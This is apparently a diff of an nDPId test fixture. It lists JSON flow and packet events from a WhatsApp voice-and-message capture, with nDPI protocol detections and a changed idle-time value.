-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1432820633803,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633803,"pkt":"ABoRAAACABoRAAABCABFAAAoADlAABAG1BCtwN69CggAARRmpQHPUwduMKz4klAS\/\/9f4wAA"} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1432820633804,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633804,"pkt":"ABoRAAACABoRAAABCABFAAAogDhAAEAGJBEKCAABrcDevaUBFGYwrPiSz1MHb1AQOQgm3AAA"} 
-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820633802,"flow_last_seen":1432820633834,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820633834,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820681899,"flow_last_seen":1432820681899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820681899,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432820681899,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820681899,"pkt":"ABoRAAACABoRAAABCABFAAA8YBFAAEAG998KCAABnlU6bcI5FGZRO+t+AAAAAKACOQiNYgAAAgQFtAQCCAoABItvAAAAAAEDAwQ="} 
-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432820681901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoAFlAABAGh6yeVTptCggAARRmwjmuxBSBUTvrf1AS\/\/\/2ZgAA"} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1432820681901,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoYBJAAEAG9\/IKCAABnlU6bcI5FGZRO+t\/rsQUglAQOQi9XwAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820681899,"flow_last_seen":1432820681935,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820681935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":225,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1432820558921,"flow_last_seen":1432820572412,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2486,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1432820691515,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820693796,"flow_last_seen":1432820693796,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820693796,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432820693796,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820693796,"pkt":"ABoRAAACABoRAAABCABFAAA8Y3lAAEAGKR4KCAABnlUFx8lyAbsu9\/NsAAAAAKACOQjjKgAAAgQFtAQCCAoABJAVAAAAAAEDAwQ="} 
-00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432820693846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoAHNAABAGvDieVQXHCggAAQG7yXLRCAyTLvfzbVAS\/\/82fwAA"} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432820693846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoY3pAAEAGKTEKCAABnlUFx8lyAbsu9\/Nt0QgMlFAQOQj9dwAA"} -00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820693796,"flow_last_seen":1432820694164,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820694164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1432820693796,"flow_last_seen":1432820695137,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":742,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432820624900,"flow_last_seen":1432820633508,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":968,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
-00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1432820633802,"flow_last_seen":1432820681629,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":2241,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820624900,"flow_last_seen":1432820624900,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820624900,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":83,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1432820624900,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820624900,"pkt":"ABoRAAACABoRAAABCABFAAA85gNAAEAGcjAKCAABnlU6Kq8TFGbeopMoAAAAAKACOQiB\/gAAAgQFtAQCCAoABHUrAAAAAAEDAwQ="} 
+00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1432820625066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAoACpAABAGiB6eVToqCggAARRmrxMhXWzX3qKTKVAS\/\/8J0AAA"} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1432820625066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820625066,"pkt":"ABoRAAACABoRAAABCABFAAAo5gRAAEAGckMKCAABnlU6Kq8TFGbeopMpIV1s2FAQOQjQyAAA"} +00657{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":86,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820624900,"flow_last_seen":1432820625127,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820625127,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00596{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820633802,"flow_last_seen":1432820633802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820633802,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1432820633802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820633802,"pkt":"ABoRAAACABoRAAABCABFAAA8gDdAAEAGI\/4KCAABrcDevaUBFGYwrPiRAAAAAKACOQgdJAAAAgQFtAQCCAoABHimAAAAAAEDAwQ="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1432820633803,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633803,"pkt":"ABoRAAACABoRAAABCABFAAAoADlAABAG1BCtwN69CggAARRmpQHPUwduMKz4klAS\/\/9f4wAA"} 
+00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1432820633804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820633804,"pkt":"ABoRAAACABoRAAABCABFAAAogDhAAEAGJBEKCAABrcDevaUBFGYwrPiSz1MHb1AQOQgm3AAA"} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":124,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820633802,"flow_last_seen":1432820633834,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820633834,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820681899,"flow_last_seen":1432820681899,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820681899,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":183,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1432820681899,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820681899,"pkt":"ABoRAAACABoRAAABCABFAAA8YBFAAEAG998KCAABnlU6bcI5FGZRO+t+AAAAAKACOQiNYgAAAgQFtAQCCAoABItvAAAAAAEDAwQ="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":184,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1432820681901,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoAFlAABAGh6yeVTptCggAARRmwjmuxBSBUTvrf1AS\/\/\/2ZgAA"} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1432820681901,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820681901,"pkt":"ABoRAAACABoRAAABCABFAAAoYBJAAEAG9\/IKCAABnlU6bcI5FGZRO+t\/rsQUglAQOQi9XwAA"} 
+00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":186,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820681899,"flow_last_seen":1432820681935,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1432820681935,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.109","src_port":49721,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1432820693796,"flow_last_seen":1432820693796,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1432820693796,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":235,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1432820693796,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1432820693796,"pkt":"ABoRAAACABoRAAABCABFAAA8Y3lAAEAGKR4KCAABnlUFx8lyAbsu9\/NsAAAAAKACOQjjKgAAAgQFtAQCCAoABJAVAAAAAAEDAwQ="} 
+00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":236,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1432820693846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoAHNAABAGvDieVQXHCggAAQG7yXLRCAyTLvfzbVAS\/\/82fwAA"} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":237,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1432820693846,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1432820693846,"pkt":"ABoRAAACABoRAAABCABFAAAoY3pAAEAGKTEKCAABnlUFx8lyAbsu9\/Nt0QgMlFAQOQj9dwAA"} +00797{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":238,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1432820693796,"flow_last_seen":1432820694164,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1432820694164,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00837{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1432820693796,"flow_last_seen":1432820695137,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":232,"flow_tot_l4_payload_len":742,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.5.199","src_port":51570,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1432820624900,"flow_last_seen":1432820633508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":968,"flow_tot_l4_payload_len":3069,"flow_avg_l4_payload_len":102,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"158.85.58.42","src_port":44819,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
+00838{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":46,"flow_first_seen":1432820558921,"flow_last_seen":1432820572412,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":2486,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"184.173.179.46","src_port":35480,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00701{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":62,"flow_first_seen":1432820633802,"flow_last_seen":1432820681629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":505,"flow_tot_l4_payload_len":2241,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.192.222.189","src_port":42241,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820568947,"flow_last_seen":1432820628171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"173.252.121.1","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00706{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820569427,"flow_last_seen":1432820629171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"179.60.192.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":261,"source":"whatsapp_voice_and_message.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1432820570876,"flow_last_seen":1432820631171,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":466,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1432820695137,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"31.13.93.48","src_port":53620,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
